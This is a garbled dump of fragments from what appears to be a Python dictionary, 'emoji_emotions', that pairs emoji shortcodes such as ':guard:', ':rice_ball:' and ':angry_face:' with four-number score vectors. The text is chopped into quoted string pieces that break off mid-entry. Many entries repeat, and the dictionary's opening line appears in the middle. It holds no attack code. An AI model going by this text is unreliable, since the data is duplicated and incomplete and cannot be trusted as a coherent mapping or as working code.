0.23399999999999999,", "[0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998,", "0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\":", "0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213,", "0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28],", "0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212,", "\":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157,", "\":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 
0.139, 0.129], \":Aries:\": [0.214, 0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218,", "[0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262,", "\":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053,", "0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381,", "0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\":", "0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077],", "0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002, 0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122],", "0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\":", "[0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113,", "0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218],", "0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187,", "[0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002,", 
"0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332],", "\":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201,", "0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\":", "[0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996,", "\":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999,", "[0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999,", "\":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17,", "0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998],", "0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37,", "0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\":", "[0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212,", "0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\":", "0.305, 0.20800000000000002], \":satellite_antenna:\": 
[0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\":", "[0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998,", "\":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168,", "0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185], \":mahjong_red_dragon:\":", "[0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233,", "0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997],", "0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002],", "[0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111,", "[0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133,", "[0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141,", "0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262],", "0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188],", "0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 
0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165,", "0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24,", "0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264,", "0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997,", "0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003],", "0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\":", "[0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001,", "0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142,", "0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182,", "0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293],", "0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\":", "\":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 
0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217,", "0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\":", "0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171,", "\":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201,", "0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\":", "0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179,", "\":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379,", "\":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196,", "0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391],", "\":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161,", "0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997,", "\":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 
0.21100000000000002,", "0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\":", "0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997],", "0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212],", "0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\":", "0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184,", "0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331],", "0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002],", "[0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228,", "\":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1,", "0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318,", "0.302, 0.27399999999999997], \":black_circle:\": [0.335, 0.212, 0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\":", "0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], 
\":page_facing_up:\":", "0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131],", "0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299,", "0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\":", "0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999],", "[0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312,", "0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102],", "0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125],", "0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\":", "\":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242,", "\":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002,", "0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25],", "[0.26, 0.225, 0.21, 0.24], 
\":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46,", "[0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201,", "0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001,", "0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125,", "0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254,", "\":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207,", "\":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324,", "[0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182,", "0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316],", "0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\":", "0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\":", "0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": 
[0.17800000000000002,", "[0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079,", "\":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25,", "[0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223,", "[0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078,", "0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\": [0.287,", "[0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359,", "\":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002,", "[0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41,", "\":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995,", "[0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999,", "0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24],", "0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243,", "0.239, 0.08], \":Tokyo_tower:\": 
[0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\":", "0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001,", "\":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999,", "0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092],", "0.156], \":wrapped_gift:\": [0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002,", "[0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239,", "emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212],", "\":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998,", "0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\": [0.256,", "[0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039,", "0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\":", "\":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179,", "[0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], 
\":night_with_stars:\": [0.09, 0.174, 0.298,", "0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207,", "0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213],", "0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193],", "[0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999,", "[0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003,", "\":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271,", "0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\":", "[0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191,", "\":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228,", "0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13],", "0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002],", "[0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 
0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096,", "0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998],", "0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226],", "0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\":", "0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172,", "[0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003,", "[0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095,", "0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289],", "0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184,", "0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002],", "0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\":", "0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248],", "0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], 
\":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\":", "0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\":", "0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126],", "\":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996,", "0.168, 0.24], \":money_with_wings:\": [0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\":", "0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\":", "0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002,", "0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\":", "0.21, 0.165, 0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371],", "0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175],", "0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\":", "[0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 